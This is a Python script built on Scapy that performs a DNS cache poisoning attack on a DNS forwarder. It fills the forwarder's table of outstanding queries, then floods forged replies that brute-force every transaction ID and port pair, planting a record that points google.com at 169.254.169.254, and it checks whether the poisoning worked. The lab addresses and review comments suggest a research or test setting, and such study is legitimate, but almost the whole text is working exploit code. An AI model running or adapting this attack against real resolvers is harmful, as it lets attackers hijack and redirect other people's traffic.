#!/usr/bin/python

import itertools
from scapy.all import *


def patch(dns_frame: bytearray, pseudo_hdr: bytes, dns_id: int, dport: int):
    """Rewrite a serialised spoofed frame in place for a new (DNS ID, port) guess.

    The fixed offsets assume a 14-byte Ethernet header followed by a 20-byte
    IPv4 header (no options), so the UDP header begins at byte 34. The UDP
    destination port and the DNS transaction ID are written big-endian (only
    the low 16 bits of each value are used). The UDP checksum is then
    recomputed over ``pseudo_hdr`` followed by the UDP datagram.

    Args:
        dns_frame: Frame bytes; modified in place.
        pseudo_hdr: IPv4 pseudo-header prepended when checksumming.
        dns_id: DNS transaction ID to write.
        dport: UDP destination port to write.
    """
    udp = 34  # start of the UDP header within the frame

    # Destination port is at UDP+2; the DNS ID is the first field after the
    # 8-byte UDP header, i.e. at UDP+8. Both are stored most significant byte first.
    for offset, value in ((udp + 2, dport), (udp + 8, dns_id)):
        dns_frame[offset] = (value >> 8) & 0xFF
        dns_frame[offset + 1] = value & 0xFF

    # The checksum field (UDP+6..UDP+7) must read as zero while it is computed.
    dns_frame[udp + 6] = dns_frame[udp + 7] = 0x00

    # A computed checksum of 0 is sent as 0xFFFF because an all-zero UDP
    # checksum field means "no checksum".
    ck = checksum(pseudo_hdr + dns_frame[udp:]) or 0xFFFF
    dns_frame[udp + 6], dns_frame[udp + 7] = struct.pack("!H", ck)


# Number of initial queries sent to the forwarder.
# NOTE(review): presumably sized to the forwarder's limit on concurrently
# forwarded queries (150 matches dnsmasq's default dns-forward-max) — confirm.
ftabsiz = 150

# Name queried to trigger forwarding, the name whose A record is spoofed,
# and the address planted for it.
qname = "example.com"
target = "google.com"
poison = "169.254.169.254"

# Lab addresses. `attacker` is not referenced anywhere below (presumably this
# host). The spoofed replies claim `cache` as their source and are sent
# to `forwarder`.
attacker = "10.10.0.3"
forwarder = "10.10.0.2"
cache = "10.10.0.4"

# Search space: every (DNS transaction ID, UDP destination port) pair.
# TXID 0 and ports 0..1024 are not tried. product() varies the port fastest,
# so all ports are swept for one TXID before moving on to the next TXID.
txids = range(0x0001, 0x10000)
sports = range(0x0401, 0x10000)
candidates = itertools.product(txids, sports)

# DNS query
# One recursive (rd=1) A/IN query for `qname`, sent to the forwarder on UDP 53.
# `dns_layer` is the DNS layer *inside* `req` (req[DNS] does not copy), so
# assigning dns_layer.id below changes the ID carried by `req` itself.
# Building the DNS layer separately and composing it with `/` would not work:
# Scapy's `/` composes copies of its operands.
qd = DNSQR(qname=qname, qtype="A", qclass='IN')
req = IP(dst=forwarder) / UDP(dport=53) / DNS(id=0, rd=1, qd=qd)
dns_layer = req[DNS]

# Socket
# Opened once on eth0 and reused: s2 (layer 2) is used later to send raw
# Ethernet frames, s3 (layer 3) sends IP packets such as `req`.
s2 = conf.L2socket(iface="eth0")
s3 = conf.L3socket(iface="eth0")

# Send `ftabsiz` copies of the same query (same name), each with a different
# DNS ID: 0 .. ftabsiz-1.
# NOTE(review): presumably intended to leave that many forwarded lookups
# outstanding at the forwarder at once — confirm against its configuration.
print("Querying non-cached names...")
for i in range(ftabsiz):
    dns_layer.id = i
    s3.send(req)

print("Generating spoofed packets...")
# Template reply that claims to come from `cache` and is addressed to the
# forwarder. It answers `qname` with a CNAME to `target`, plus an A record
# mapping `target` to `poison`, both with TTL 900. The UDP dport and the DNS
# ID are 0 placeholders; patch() overwrites them for every guess.
res = (
    Ether()
    / IP(src=cache, dst=forwarder)
    / UDP(sport=53, dport=0)
    / DNS(
        id=0,
        qr=1,
        ra=1,
        qd=qd,
        an=(
            DNSRR(rrname=qname, ttl=900, rdata=target, type="CNAME", rclass="IN")
            / DNSRR(rrname=target, ttl=900, rdata=poison, type="A", rclass="IN")
        ),
    )
)

# Optimization: serialise once, then edit these bytes directly for each guess
# instead of rebuilding and re-serialising the Scapy packet.
dns_frame = bytearray(raw(res))

# IPv4 pseudo-header for the UDP checksum: source address, destination
# address, zero byte + protocol (packed together as one 16-bit field), and the
# UDP length. The UDP length is everything after the Ethernet + IP headers,
# assumed to be 14 + 20 = 34 bytes.
pseudo_hdr = struct.pack(
    "!4s4sHH",
    inet_pton(socket.AF_INET, res["IP"].src),
    inet_pton(socket.AF_INET, res["IP"].dst),
    socket.IPPROTO_UDP,
    len(dns_frame) - 34,
)

# Follow-up query asking the forwarder for `target`, used to check whether the
# planted record is being served.
verify = IP(dst=forwarder) / UDP(dport=53) / DNS(rd=1, qd=DNSQR(qname=target, qtype="A", qclass='IN'))

start_time = time.time()

n_pkts = 0
try:
    for txid, sport in candidates:
        # Update TXID and UDP dst port, then transmit the raw frame.
        patch(dns_frame, pseudo_hdr, txid, sport)
        s2.send(dns_frame)
        n_pkts += 1

        # After a full port sweep for one TXID (last port of `sports`), query
        # the forwarder. Only an answer equal to `poison` counts as success.
        # A legitimate answer for `target`, e.g. once the real record has been
        # cached, must not be reported as "Poisoned".
        if sport == sports[-1]:
            reply = sr1(verify, verbose=0, iface="eth0", timeout=0.01)
            if reply is not None and reply.haslayer(DNSRR):
                answer = reply[DNSRR]
                if str(answer.rdata) == poison:
                    print(f"Poisoned: {answer.rrname} => {answer.rdata}")
                    break
finally:
    # Release the raw sockets even if the sweep is interrupted (e.g. Ctrl-C).
    s2.close()
    s3.close()

end_time = time.time()
print(f"sent {n_pkts} responses in {end_time - start_time:.3f} seconds")
